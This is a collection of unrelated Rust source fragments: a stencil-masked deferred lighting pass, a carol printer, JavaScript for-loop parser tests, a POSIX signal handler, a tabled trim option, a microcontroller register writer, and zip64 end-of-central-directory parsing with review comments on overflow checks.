                    culling: true,
                    color_write: ColorMask::all(false),
                    depth_write: false,
                    stencil_test: true,
                    depth_test: true,
                    blend: false,
                },
                &[
                    (self.flat_shader.wvp_matrix, UniformValue::Mat4(
                        view_projection * Mat4::translate(light_position) * Mat4::scale(light_radius_vec)
                    ))
                ],
            );
            state.set_stencil_func(StencilFunc { func: gl::ALWAYS, ..Default::default() });
            state.set_stencil_op(StencilOp { zfail: gl::DECR, ..Default::default() });
            // Second stencil pass: back-culled sphere, decrement on depth fail;
            // pixels inside the light volume end with a non-zero stencil value.
            statistics += gbuffer.final_frame.draw(
                sphere,
                state,
                viewport,
                &self.flat_shader.program,
                DrawParameters {
                    cull_face: CullFace::Back,
                    culling: true,
                    color_write: ColorMask::all(false),
                    depth_write: false,
                    stencil_test: true,
                    depth_test: true,
                    blend: false,
                },
                &[
                    (self.flat_shader.wvp_matrix, UniformValue::Mat4(
                        view_projection * Mat4::translate(light_position) * Mat4::scale(light_radius_vec)
                    ))
                ],
            );
            // Shade only where stencil != 0; zero the stencil as we go so the
            // buffer is clean for the next light.
            state.set_stencil_func(StencilFunc { func: gl::NOTEQUAL, ..Default::default() });
            state.set_stencil_op(StencilOp { zpass: gl::ZERO, ..Default::default() });
            let draw_params = DrawParameters {
                cull_face: CullFace::Back,
                culling: false,
                color_write: Default::default(),
                depth_write: false,
                stencil_test: true,
                depth_test: false,
                blend: true,
            };
            let quad = geometry_cache.get(state, &self.quad);
            // Fullscreen lighting pass with the shader matching the light kind.
            statistics += match light.kind() {
                LightKind::Spot(spot_light) => {
                    let shader = &self.spot_light_shader;
                    let uniforms = [
                        (shader.shadows_enabled, UniformValue::Bool(shadows_enabled)),
                        (shader.light_view_proj_matrix, UniformValue::Mat4(light_view_projection)),
                        (shader.soft_shadows, UniformValue::Bool(settings.spot_soft_shadows)),
                        (shader.light_position, UniformValue::Vec3(light_position)),
                        (shader.light_direction, UniformValue::Vec3(emit_direction)),
                        (shader.light_radius, UniformValue::Float(light_radius)),
                        (shader.inv_view_proj_matrix, UniformValue::Mat4(inv_view_projection)),
                        (shader.light_color, UniformValue::Color(light.color())),
                        (shader.half_hotspot_cone_angle_cos, UniformValue::Float((spot_light.hotspot_cone_angle() * 0.5).cos())),
                        (shader.half_cone_angle_cos, UniformValue::Float((spot_light.full_cone_angle() * 0.5).cos())),
                        (shader.wvp_matrix, UniformValue::Mat4(frame_matrix)),
                        (shader.shadow_map_inv_size, UniformValue::Float(1.0 / (self.spot_shadow_map_renderer.size as f32))),
                        (shader.camera_position, UniformValue::Vec3(camera.global_position())),
                        (shader.depth_sampler, UniformValue::Sampler { index: 0, texture: gbuffer.depth() }),
                        (shader.color_sampler, UniformValue::Sampler { index: 1, texture: gbuffer.diffuse_texture() }),
                        (shader.normal_sampler, UniformValue::Sampler { index: 2, texture: gbuffer.normal_texture() }),
                        (shader.spot_shadow_texture, UniformValue::Sampler { index: 3, texture: self.spot_shadow_map_renderer.texture() }),
                    ];
                    gbuffer.final_frame.draw(
                        quad,
                        state,
                        viewport,
                        &shader.program,
                        draw_params,
                        &uniforms)
                }
                LightKind::Point(_) => {
                    let shader = &self.point_light_shader;
                    let uniforms = [
                        (shader.shadows_enabled, UniformValue::Bool(shadows_enabled)),
                        (shader.soft_shadows, UniformValue::Bool(settings.point_soft_shadows)),
                        (shader.light_position, UniformValue::Vec3(light_position)),
                        (shader.light_radius, UniformValue::Float(light_radius)),
                        (shader.inv_view_proj_matrix, UniformValue::Mat4(inv_view_projection)),
                        (shader.light_color, UniformValue::Color(light.color())),
                        (shader.wvp_matrix, UniformValue::Mat4(frame_matrix)),
                        (shader.camera_position, UniformValue::Vec3(camera.global_position())),
                        (shader.depth_sampler, UniformValue::Sampler { index: 0, texture: gbuffer.depth() }),
                        (shader.color_sampler, UniformValue::Sampler { index: 1, texture: gbuffer.diffuse_texture() }),
                        (shader.normal_sampler, UniformValue::Sampler { index: 2, texture: gbuffer.normal_texture() }),
                        (shader.point_shadow_texture, UniformValue::Sampler { index: 3, texture: self.point_shadow_map_renderer.texture() })
                    ];
                    gbuffer.final_frame.draw(
                        quad,
                        state,
                        viewport,
                        &shader.program,
                        draw_params,
                        &uniforms)
                }
                LightKind::Directional => {
                    let shader = &self.directional_light_shader;
                    let uniforms = [
                        (shader.light_direction, UniformValue::Vec3(emit_direction)),
                        (shader.inv_view_proj_matrix, UniformValue::Mat4(inv_view_projection)),
                        (shader.light_color, UniformValue::Color(light.color())),
                        (shader.wvp_matrix, UniformValue::Mat4(frame_matrix)),
                        (shader.camera_position, UniformValue::Vec3(camera.global_position())),
                        (shader.depth_sampler, UniformValue::Sampler { index: 0, texture: gbuffer.depth() }),
                        (shader.color_sampler, UniformValue::Sampler { index: 1, texture: gbuffer.diffuse_texture() }),
                        (shader.normal_sampler, UniformValue::Sampler { index: 2, texture: gbuffer.normal_texture() }),
                    ];
                    // Directional lights affect the whole screen, so no stencil
                    // masking is used here.
                    gbuffer.final_frame.draw(
                        quad,
                        state,
                        viewport,
                        &shader.program,
                        DrawParameters {
                            cull_face: CullFace::Back,
                            culling: false,
                            color_write: Default::default(),
                            depth_write: false,
                            stencil_test: false,
                            depth_test: false,
                            blend: true,
                        },
                        &uniforms)
                }
            };
            if settings.light_scatter_enabled {
                statistics += self.light_volume.render_volume(
                    state,
                    light,
                    gbuffer,
                    &self.quad,
                    geometry_cache,
                    camera.view_matrix(),
                    projection_matrix.inverse().unwrap_or_default(),
                    camera.view_projection_matrix(),
                    viewport
                );
            }
        }
        statistics
    }
}
/// Prints all twelve verses of "The Twelve Days of Christmas".
fn main() {
    let days = ["first", "second", "third", "fourth", "fifth", "sixth",
                "seventh", "eighth", "ninth", "tenth", "eleventh", "twelfth"];
    // Gifts two through twelve, in ascending order; verse `day` prints the
    // first `day` of them in reverse, then the partridge line.
    let gifts = [
        "Two turtle doves",
        "Three french hens",
        "Four calling birds",
        "Five gold rings",
        "Six Geese a-laying",
        "Seven swans a-swimming",
        "Eight maids a-milking",
        "Nine ladies dancing",
        "Ten lords a-leaping",
        "Eleven pipers piping",
        "Twelve drummers drumming",
    ];
    for (day, name) in days.iter().enumerate() {
        println!("On the {} {}", name, "day of Christmas");
        println!("My true love gave to me");
        for gift in gifts[..day].iter().rev() {
            println!("{}", gift);
        }
        println!("A partridge in a pear tree\n");
    }
}
|
use crate::features::syntax::StatementFeature;
use crate::parse::visitor::tests::assert_stmt_feature;
// C-style `for (init; test; update)` loops, classified by how the loop head
// introduces its binding: bare expression vs `var`.
#[test]
fn for_expr() {
    assert_stmt_feature(
        "for (a = b; true; false) { a++ }",
        StatementFeature::ForExprStatement,
    );
}
// A fully empty head still classifies as an expression-style `for`.
#[test]
fn for_expr_empty() {
    assert_stmt_feature("for (;;) return;", StatementFeature::ForExprStatement);
}
#[test]
fn for_var() {
    assert_stmt_feature(
        "for (var i = 0; i < 10; i++) arr.push(i);",
        StatementFeature::ForVarStatement,
    );
}
// `let` and `const` loop heads both map to the single lexical variant.
#[test]
fn for_lexical_let() {
    assert_stmt_feature(
        "for (let i = 0; i < 10; i++) arr.push(i);",
        StatementFeature::ForLexicalStatement,
    );
}
#[test]
fn for_lexical_const() {
    assert_stmt_feature(
        "for (const i = 0;;) { break }",
        StatementFeature::ForLexicalStatement,
    );
}
// `for…in` statements: expression, `var`, and lexical (`let`/`const`) heads.
#[test]
fn for_in_expr() {
    assert_stmt_feature(
        "for (a in obj) { console.log(a) }",
        StatementFeature::ForInExprStatement,
    );
}
#[test]
fn for_in_var() {
    assert_stmt_feature(
        "for (var key in obj) key;",
        StatementFeature::ForInVarStatement,
    );
}
#[test]
fn for_in_lexical_let() {
    assert_stmt_feature(
        "for (let key in obj) key;",
        StatementFeature::ForInLexicalStatement,
    );
}
#[test]
fn for_in_lexical_const() {
    assert_stmt_feature(
        "for (const key in obj) { break }",
        StatementFeature::ForInLexicalStatement,
    );
}
// `for…of` statements: expression, `var`, and lexical (`let`/`const`) heads.
#[test]
fn for_of_expr() {
    assert_stmt_feature(
        "for (a of obj) { console.log(a) }",
        StatementFeature::ForOfExprStatement,
    );
}
#[test]
fn for_of_var() {
    assert_stmt_feature(
        "for (var key of obj) key;",
        StatementFeature::ForOfVarStatement,
    );
}
#[test]
fn for_of_lexical_let() {
    assert_stmt_feature(
        "for (let key of obj) key;",
        StatementFeature::ForOfLexicalStatement,
    );
}
#[test]
fn for_of_lexical_const() {
    assert_stmt_feature(
        "for (const key of obj) { break }",
        StatementFeature::ForOfLexicalStatement,
    );
}
// `for await…of` statements: same three head shapes as plain `for…of`.
#[test]
fn for_await_of_expr() {
    assert_stmt_feature(
        "for await (a of obj) { console.log(a) }",
        StatementFeature::ForAwaitOfExprStatement,
    );
}
#[test]
fn for_await_of_var() {
    assert_stmt_feature(
        "for await (var key of obj) key;",
        StatementFeature::ForAwaitOfVarStatement,
    );
}
#[test]
fn for_await_of_lexical_let() {
    // Note: no space between `await` and `(` in this input.
    assert_stmt_feature(
        "for await(let key of obj) key;",
        StatementFeature::ForAwaitOfLexicalStatement,
    );
}
#[test]
fn for_await_of_lexical_const() {
    assert_stmt_feature(
        "for await (const key of obj) { break }",
        StatementFeature::ForAwaitOfLexicalStatement,
    );
}
|
use std::fmt::{self, Display, Formatter};
use std::sync::atomic::{AtomicUsize, Ordering, ATOMIC_USIZE_INIT};
pub static PENDING: AtomicUsize = ATOMIC_USIZE_INIT;
/// Signals this process reacts to; `init`'s handler stores the caught variant
/// into `PENDING` via `as usize`.
#[repr(u8)]
pub enum Signal {
    // NOTE(review): with default discriminants `Interrupt` is 0, which is the
    // same as PENDING's initial value — a stored SIGINT is indistinguishable
    // from "no signal yet". Confirm whether non-zero discriminants were intended.
    /// Mapped from SIGINT.
    Interrupt,
    /// Mapped from SIGHUP.
    Hangup,
    /// Mapped from SIGTERM.
    Terminate,
}
impl Display for Signal {
    /// Writes the lowercase, human-readable name of the signal.
    fn fmt(&self, fmt: &mut Formatter) -> fmt::Result {
        fmt.write_str(match *self {
            Signal::Interrupt => "interrupt",
            Signal::Hangup => "hangup",
            Signal::Terminate => "terminate",
        })
    }
}
// Installs a single C handler for SIGHUP, SIGINT and SIGTERM that records the
// caught signal in `PENDING` for the main loop to pick up.
pub fn init() {
    // Translates the raw libc signal number to `Signal` and publishes it.
    extern "C" fn handler(signal: i32) {
        let signal = match signal {
            libc::SIGINT => Signal::Interrupt,
            libc::SIGHUP => Signal::Hangup,
            libc::SIGTERM => Signal::Terminate,
            // `init` registers this handler only for the three signals above.
            _ => unreachable!(),
        };
        // NOTE(review): `warn!` goes through the logging machinery, which is
        // generally not async-signal-safe — confirm this is acceptable here.
        warn!("caught {} signal", signal);
        PENDING.store(signal as usize, Ordering::SeqCst);
    }
    // SAFETY(review): `handler` is an `extern "C" fn(i32)` cast to
    // `sighandler_t`; return values of `libc::signal` are deliberately ignored.
    unsafe {
        let _ = libc::signal(libc::SIGHUP, handler as libc::sighandler_t);
        let _ = libc::signal(libc::SIGINT, handler as libc::sighandler_t);
        let _ = libc::signal(libc::SIGTERM, handler as libc::sighandler_t);
    }
}
|
use crate::{
grid::config::ColoredConfig,
grid::config::Entity,
settings::{CellOption, TableOption},
};
/// `TrimStrategy` determines if it's allowed to use empty space while doing [`Alignment`].
///
/// # Examples
///
/// ```
/// use tabled::{
/// Table,
/// settings::{
/// Style, Modify, Alignment, object::Segment,
/// formatting::{TrimStrategy, AlignmentStrategy}
/// }
/// };
///
/// let mut table = Table::new(&[" Hello World"]);
/// table
/// .with(Style::modern())
/// .with(
/// Modify::new(Segment::all())
/// .with(Alignment::left())
/// .with(TrimStrategy::Horizontal)
/// );
///
/// // Note that nothing has visibly changed yet.
///
/// assert_eq!(
/// table.to_string(),
/// "┌────────────────┐\n\
/// │ &str │\n\
/// ├────────────────┤\n\
/// │ Hello World │\n\
/// └────────────────┘"
/// );
///
/// // To trim lines you would need also set [`AlignmentStrategy`].
/// table.with(Modify::new(Segment::all()).with(AlignmentStrategy::PerLine));
///
/// assert_eq!(
/// table.to_string(),
/// "┌────────────────┐\n\
/// │ &str │\n\
/// ├────────────────┤\n\
/// │ Hello World │\n\
/// └────────────────┘"
/// );
///
/// let mut table = Table::new(&[" \n\n\n Hello World"]);
/// table
/// .with(Style::modern())
/// .with(
/// Modify::new(Segment::all())
/// .with(Alignment::center())
/// .with(Alignment::top())
/// .with(TrimStrategy::Vertical)
/// );
///
/// assert_eq!(
/// table.to_string(),
/// "┌─────────────────┐\n\
/// │ &str │\n\
/// ├─────────────────┤\n\
/// │ Hello World │\n\
/// │ │\n\
/// │ │\n\
/// │ │\n\
/// └─────────────────┘"
/// );
/// ```
///
/// [`Alignment`]: crate::settings::Alignment
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum TrimStrategy {
    /// Allow vertical trim (enables the `vertical_trim` formatting flag).
    Vertical,
    /// Allow horizontal trim (enables the `horizontal_trim` formatting flag).
    Horizontal,
    /// Allow horizontal and vertical trim (enables both formatting flags).
    Both,
    /// Doesn't allow any trim (clears both formatting flags).
    None,
}
impl<R> CellOption<R, ColoredConfig> for TrimStrategy {
    /// Copies the current formatting of `entity`, toggles the trim flags this
    /// strategy controls, and writes the settings back into the config.
    fn change(self, _: &mut R, cfg: &mut ColoredConfig, entity: Entity) {
        let mut settings = *cfg.get_formatting(entity);
        match self {
            TrimStrategy::Vertical => settings.vertical_trim = true,
            TrimStrategy::Horizontal => settings.horizontal_trim = true,
            TrimStrategy::Both => {
                settings.vertical_trim = true;
                settings.horizontal_trim = true;
            }
            TrimStrategy::None => {
                settings.vertical_trim = false;
                settings.horizontal_trim = false;
            }
        }
        cfg.set_formatting(entity, settings);
    }
}
impl<R, D> TableOption<R, D, ColoredConfig> for TrimStrategy {
    // Applying the strategy table-wide delegates to the cell-level
    // implementation with the `Global` entity.
    fn change(self, records: &mut R, cfg: &mut ColoredConfig, _: &mut D) {
        <Self as CellOption<_, _>>::change(self, records, cfg, Entity::Global)
    }
    // No change hint is reported for this option.
    fn hint_change(&self) -> Option<Entity> {
        None
    }
}
|
#[doc = "Register `IFCR` writer"]
pub type W = crate::W<IFCR_SPEC>;
// Write-only marker type for the EOTC bit; the only expressible action is
// `Clear` (writing 1).
#[doc = "End Of Transfer flag clear\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum EOTCW_AW {
    #[doc = "1: Clear interrupt flag"]
    Clear = 1,
}
impl From<EOTCW_AW> for bool {
#[inline(always)]
fn from(variant: EOTCW_AW) -> Self {
variant as u8 != 0
}
}
#[doc = "Field `EOTC` writer - End Of Transfer flag clear"]
pub type EOTC_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O, EOTCW_AW>;
impl<'a, REG, const O: u8> EOTC_W<'a, REG, O>
where
    REG: crate::Writable + crate::RegisterSpec,
{
    #[doc = "Clear interrupt flag"]
    #[inline(always)]
    pub fn clear(self) -> &'a mut crate::W<REG> {
        self.variant(EOTCW_AW::Clear)
    }
}
// All remaining flag-clear fields share the same single-action shape, so they
// reuse the EOTC writer type under field-specific names.
#[doc = "Field `TXTFC` writer - Transmission Transfer Filled flag clear"]
pub use EOTC_W as TXTFC_W;
#[doc = "Field `UDRC` writer - Underrun flag clear"]
pub use EOTC_W as UDRC_W;
#[doc = "Field `OVRC` writer - Overrun flag clear"]
pub use EOTC_W as OVRC_W;
#[doc = "Field `CRCEC` writer - CRC Error flag clear"]
pub use EOTC_W as CRCEC_W;
#[doc = "Field `TIFREC` writer - TI frame format error flag clear"]
pub use EOTC_W as TIFREC_W;
#[doc = "Field `MODFC` writer - Mode Fault flag clear"]
pub use EOTC_W as MODFC_W;
#[doc = "Field `TSERFC` writer - TSERFC flag clear"]
pub use EOTC_W as TSERFC_W;
#[doc = "Field `SUSPC` writer - SUSPend flag clear"]
pub use EOTC_W as SUSPC_W;
// One accessor per flag-clear field; each returns a bit writer positioned at
// the field's bit offset within IFCR.
impl W {
    #[doc = "Bit 3 - End Of Transfer flag clear"]
    #[inline(always)]
    #[must_use]
    pub fn eotc(&mut self) -> EOTC_W<IFCR_SPEC, 3> {
        EOTC_W::new(self)
    }
    #[doc = "Bit 4 - Transmission Transfer Filled flag clear"]
    #[inline(always)]
    #[must_use]
    pub fn txtfc(&mut self) -> TXTFC_W<IFCR_SPEC, 4> {
        TXTFC_W::new(self)
    }
    #[doc = "Bit 5 - Underrun flag clear"]
    #[inline(always)]
    #[must_use]
    pub fn udrc(&mut self) -> UDRC_W<IFCR_SPEC, 5> {
        UDRC_W::new(self)
    }
    #[doc = "Bit 6 - Overrun flag clear"]
    #[inline(always)]
    #[must_use]
    pub fn ovrc(&mut self) -> OVRC_W<IFCR_SPEC, 6> {
        OVRC_W::new(self)
    }
    #[doc = "Bit 7 - CRC Error flag clear"]
    #[inline(always)]
    #[must_use]
    pub fn crcec(&mut self) -> CRCEC_W<IFCR_SPEC, 7> {
        CRCEC_W::new(self)
    }
    #[doc = "Bit 8 - TI frame format error flag clear"]
    #[inline(always)]
    #[must_use]
    pub fn tifrec(&mut self) -> TIFREC_W<IFCR_SPEC, 8> {
        TIFREC_W::new(self)
    }
    #[doc = "Bit 9 - Mode Fault flag clear"]
    #[inline(always)]
    #[must_use]
    pub fn modfc(&mut self) -> MODFC_W<IFCR_SPEC, 9> {
        MODFC_W::new(self)
    }
    #[doc = "Bit 10 - TSERFC flag clear"]
    #[inline(always)]
    #[must_use]
    pub fn tserfc(&mut self) -> TSERFC_W<IFCR_SPEC, 10> {
        TSERFC_W::new(self)
    }
    #[doc = "Bit 11 - SUSPend flag clear"]
    #[inline(always)]
    #[must_use]
    pub fn suspc(&mut self) -> SUSPC_W<IFCR_SPEC, 11> {
        SUSPC_W::new(self)
    }
    #[doc = "Writes raw bits to the register."]
    // Escape hatch: replaces the whole register value at once, bypassing the
    // typed per-field writers above, hence `unsafe`.
    #[inline(always)]
    pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
        self.bits = bits;
        self
    }
}
#[doc = "Interrupt/Status Flags Clear Register\n\nYou can [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero) this register using [`ifcr::W`](W). See [API](https://docs.rs/svd2rust/#read--modify--write-api)."]
pub struct IFCR_SPEC;
// IFCR is a 32-bit register.
impl crate::RegisterSpec for IFCR_SPEC {
    type Ux = u32;
}
#[doc = "`write(|w| ..)` method takes [`ifcr::W`](W) writer structure"]
// Both modify bitmaps are zero: no bit of this register is forced to a fixed
// 0 or 1 when other fields are modified.
impl crate::Writable for IFCR_SPEC {
    const ZERO_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
    const ONE_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
}
#[doc = "`reset()` method sets IFCR to value 0"]
// All-zero reset value, matching "Value on reset: 0" in the field docs.
impl crate::Resettable for IFCR_SPEC {
    const RESET_VALUE: Self::Ux = 0;
}
|
use super::error::*;
use hex_fmt::HexFmt;
use positioned_io::ReadAt;
use std::fmt;
use nom::{
bytes::complete::tag,
combinator::map,
error::ParseError,
multi::length_data,
number::complete::{le_u16, le_u32, le_u64},
sequence::{preceded, tuple},
IResult,
};
// Reference code for zip handling:
// https://github.com/itchio/arkive/blob/master/zip/reader.go
#[derive(Debug)]
/// 4.3.16 End of central directory record:
pub(crate) struct EndOfCentralDirectoryRecord {
    /// number of this disk
    pub(crate) disk_nbr: u16,
    /// number of the disk with the start of the central directory
    pub(crate) dir_disk_nbr: u16,
    /// total number of entries in the central directory on this disk
    pub(crate) dir_records_this_disk: u16,
    /// total number of entries in the central directory
    pub(crate) directory_records: u16,
    /// size of the central directory
    pub(crate) directory_size: u32,
    /// offset of start of central directory with respect to the starting disk number
    pub(crate) directory_offset: u32,
    /// .ZIP file comment
    pub(crate) comment: ZipString,
}
impl EndOfCentralDirectoryRecord {
    /// does not include comment size & comment data
    pub(crate) const LENGTH: usize = 20;
    /// Scans the tail of `reader` for the end-of-central-directory record:
    /// first the last 1 KiB, then a 65 KiB window (the record is followed by a
    /// variable-length comment, so it can sit up to ~64 KiB from the end).
    ///
    /// Returns the record's absolute offset and the parsed record, or `None`
    /// if no record signature was found in either window.
    fn read<R: ReadAt>(reader: &R, size: usize) -> Result<Option<(usize, Self)>, Error> {
        let ranges: [usize; 2] = [1024, 65 * 1024];
        for &b_len in &ranges {
            let b_len = std::cmp::min(b_len, size);
            let mut buf = vec![0u8; b_len];
            reader.read_exact_at((size - b_len) as u64, &mut buf)?;
            if let Some((offset, directory)) = Self::find_in_block(&buf[..]) {
                let offset = size - b_len + offset;
                return Ok(Some((offset, directory)));
            }
        }
        Ok(None)
    }
    /// Searches `b` backwards for a parseable EOCD record, returning its
    /// offset within `b` and the parsed record.
    fn find_in_block(b: &[u8]) -> Option<(usize, Self)> {
        // Guard against blocks shorter than a record: the previous expression
        // `b.len() - Self::LENGTH + 1` underflowed for b.len() < 19 (panic in
        // debug builds, wrap-around in release builds), which is reachable via
        // `read` when the input file is smaller than `LENGTH`.
        let upper = b.len().checked_sub(Self::LENGTH - 1)?;
        for i in (0..upper).rev() {
            let slice = &b[i..];
            if let Ok((_, directory)) = Self::parse::<DecodingError>(slice) {
                return Some((i, directory));
            }
        }
        None
    }
    /// nom parser for the EOCD record, anchored on the "PK\x05\x06" signature.
    fn parse<'a, E: ParseError<&'a [u8]>>(i: &'a [u8]) -> IResult<&'a [u8], Self, E> {
        preceded(
            tag("PK\x05\x06"),
            map(
                tuple((
                    le_u16,
                    le_u16,
                    le_u16,
                    le_u16,
                    le_u32,
                    le_u32,
                    length_data(le_u16),
                )),
                |t| Self {
                    disk_nbr: t.0,
                    dir_disk_nbr: t.1,
                    dir_records_this_disk: t.2,
                    directory_records: t.3,
                    directory_size: t.4,
                    directory_offset: t.5,
                    comment: ZipString(t.6.into()),
                },
            ),
        )(i)
    }
}
#[derive(Debug)]
/// 4.3.15 Zip64 end of central directory locator
pub(crate) struct EndOfCentralDirectory64Locator {
    /// number of the disk with the start of the zip64 end of central directory
    pub(crate) dir_disk_number: u32,
    /// relative offset of the zip64 end of central directory record
    pub(crate) directory_offset: u64,
    /// total number of disks
    pub(crate) total_disks: u32,
}
impl EndOfCentralDirectory64Locator {
    /// Fixed locator size: signature (4) + disk number (4) + offset (8)
    /// + total disks (4).
    pub(crate) const LENGTH: usize = 20;
    /// nom parser, anchored on the "PK\x06\x07" locator signature.
    fn parse<'a, E: ParseError<&'a [u8]>>(i: &'a [u8]) -> IResult<&'a [u8], Self, E> {
        preceded(
            tag("PK\x06\x07"),
            map(tuple((le_u32, le_u64, le_u32)), |t| Self {
                dir_disk_number: t.0,
                directory_offset: t.1,
                total_disks: t.2,
            }),
        )(i)
    }
}
#[derive(Debug)]
/// 4.3.14 Zip64 end of central directory record
pub(crate) struct EndOfCentralDirectory64Record {
    /// size of zip64 end of central directory record
    pub(crate) record_size: u64,
    /// version made by
    pub(crate) version_made_by: u16,
    /// version needed to extract
    pub(crate) version_needed: u16,
    /// number of this disk
    pub(crate) disk_nbr: u32,
    /// number of the disk with the start of the central directory
    pub(crate) dir_disk_nbr: u32,
    /// total number of entries in the central directory on this disk
    pub(crate) dir_records_this_disk: u64,
    /// total number of entries in the central directory
    pub(crate) directory_records: u64,
    /// size of the central directory
    pub(crate) directory_size: u64,
    /// offset of the start of central directory with respect to the
    /// starting disk number
    pub(crate) directory_offset: u64,
}
impl EndOfCentralDirectory64Record {
    // Fixed record size, not counting the variable extensible data sector.
    pub(crate) const LENGTH: usize = 56;
    // Looks for the zip64 locator immediately before the classic EOCD record
    // (at `directory_end_offset`), then follows it to the zip64 record.
    // Returns `Ok(None)` when the file is simply not a zip64 archive.
    fn read<R: ReadAt>(
        reader: &R,
        directory_end_offset: usize,
    ) -> Result<Option<(usize, Self)>, Error> {
        if directory_end_offset < EndOfCentralDirectory64Locator::LENGTH {
            // no need to look for a header outside the file
            return Ok(None);
        }
        let loc_offset = directory_end_offset - EndOfCentralDirectory64Locator::LENGTH;
        let mut locbuf = vec![0u8; EndOfCentralDirectory64Locator::LENGTH];
        reader.read_exact_at(loc_offset as u64, &mut locbuf)?;
        let locres = EndOfCentralDirectory64Locator::parse::<DecodingError>(&locbuf[..]);
        if let Ok((_, locator)) = locres {
            // Multi-disk zip64 archives are not supported: both checks below
            // require a single-disk layout.
            if locator.dir_disk_number != 0 {
                // the file is not a valid zip64 file
                return Ok(None);
            }
            if locator.total_disks != 1 {
                // the file is not a valid zip64 file
                return Ok(None);
            }
            let offset = locator.directory_offset as usize;
            let mut recbuf = vec![0u8; EndOfCentralDirectory64Record::LENGTH];
            reader.read_exact_at(offset as u64, &mut recbuf)?;
            let recres = Self::parse::<DecodingError>(&recbuf[..]);
            if let Ok((_, record)) = recres {
                return Ok(Some((offset, record)));
            }
        }
        Ok(None)
    }
    // nom parser for the zip64 EOCD record, anchored on "PK\x06\x06".
    fn parse<'a, E: ParseError<&'a [u8]>>(
        i: &'a [u8],
    ) -> IResult<&'a [u8], EndOfCentralDirectory64Record, E> {
        preceded(
            tag("PK\x06\x06"),
            map(
                tuple((
                    le_u64, le_u16, le_u16, le_u32, le_u32, le_u64, le_u64, le_u64, le_u64,
                )),
                |t| EndOfCentralDirectory64Record {
                    record_size: t.0,
                    version_made_by: t.1,
                    version_needed: t.2,
                    disk_nbr: t.3,
                    dir_disk_nbr: t.4,
                    dir_records_this_disk: t.5,
                    directory_records: t.6,
                    directory_size: t.7,
                    directory_offset: t.8,
                },
            ),
        )(i)
    }
}
#[derive(Debug)]
/// Coalesces zip and zip64 "end of central directory" record info
pub(crate) struct EndOfCentralDirectory {
    /// The classic end-of-central-directory record (always present).
    pub(crate) dir: EndOfCentralDirectoryRecord,
    /// The zip64 record, when the archive is a valid zip64 file.
    pub(crate) dir64: Option<EndOfCentralDirectory64Record>,
    /// Bytes of padding (e.g. a self-extracting stub) before the first
    /// entry, detected by comparing recorded and computed offsets.
    pub(crate) start_skip_len: usize,
}
impl EndOfCentralDirectory {
    /// Reads the classic (and, when present, zip64) end-of-central-directory
    /// records from `reader` and reconciles their offsets, accounting for
    /// possible padding at the start of the file.
    pub(crate) fn read<R: ReadAt>(reader: &R, size: usize) -> Result<Self, Error> {
        let (d_offset, d) = EndOfCentralDirectoryRecord::read(reader, size)?
            .ok_or(FormatError::DirectoryEndSignatureNotFound)?;
        // Saturated sentinel values mean the real value did not fit in the
        // classic record, so the file can be a zip64 file. Per APPNOTE the
        // 16-bit record count saturates at 0xffff while the 32-bit
        // size/offset fields saturate at 0xffff_ffff. (The previous check
        // compared the 32-bit fields against 0xffff, which only matched the
        // accidental value 65535.)
        //
        // However, on macOS, some .zip files have a zip64 directory
        // but don't have these values, cf. https://github.com/itchio/butler/issues/141
        let probably_zip64 = d.directory_records == 0xffff
            || d.directory_size == 0xffff_ffff
            || d.directory_offset == 0xffff_ffff;
        let mut d64_info: Option<(usize, EndOfCentralDirectory64Record)> = None;
        let res64 = EndOfCentralDirectory64Record::read(reader, d_offset);
        match res64 {
            Ok(Some(found_d64_info)) => {
                d64_info = Some(found_d64_info);
            }
            Ok(None) => { /* not a zip64 file, that's ok! */ }
            Err(e) => {
                // Only a file that advertised zip64 is required to carry a
                // readable zip64 record.
                if probably_zip64 {
                    return Err(e);
                }
            }
        }
        // NOTE(review): these subtractions can underflow (panic) on a
        // corrupt record whose directory_size exceeds its offset — consider
        // checked_sub with a FormatError.
        let computed_directory_offset = match d64_info.as_ref() {
            // cf. https://users.cs.jmu.edu/buchhofp/forensics/formats/pkzip.html
            // `directorySize` does not include
            // - Zip64 end of central directory record
            // - Zip64 end of central directory locator
            // and we don't want to be a few bytes off, now do we.
            Some((d64_offset, d64)) => *d64_offset - d64.directory_size as usize,
            None => d_offset - d.directory_size as usize,
        };
        //
        // Pure .zip files look like this:
        // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        //                     <------directory_size----->
        // [ Data 1 ][ Data 2 ][    Central directory    ][ ??? ]
        // ^                   ^                          ^
        // 0                   directory_offset           directory_end_offset
        // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        //
        // But there exist some valid zip archives with padding at the beginning, like so:
        // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        // <-start_skip_len->                    <------directory_size----->
        // [    Padding     ][ Data 1 ][ Data 2 ][    Central directory    ][ ??? ]
        // ^                 ^                   ^                          ^
        // 0                 start_skip_len      computed_directory_offset  directory_end_offset
        // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        //
        // (e.g. https://www.icculus.org/mojosetup/ installers are ELF binaries with a .zip file appended)
        //
        // `directory_end_offset` is found by scanning the file (so it accounts for padding), but
        // `directory_offset` is found by reading a data structure (so it does not account for padding).
        // If we just trusted `directory_offset`, we'd be reading the central directory at the wrong place:
        // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        //                                       <------directory_size----->
        // [    Padding     ][ Data 1 ][ Data 2 ][    Central directory    ][ ??? ]
        // ^                 ^                   ^                          ^
        // 0                 directory_offset - woops!                      directory_end_offset
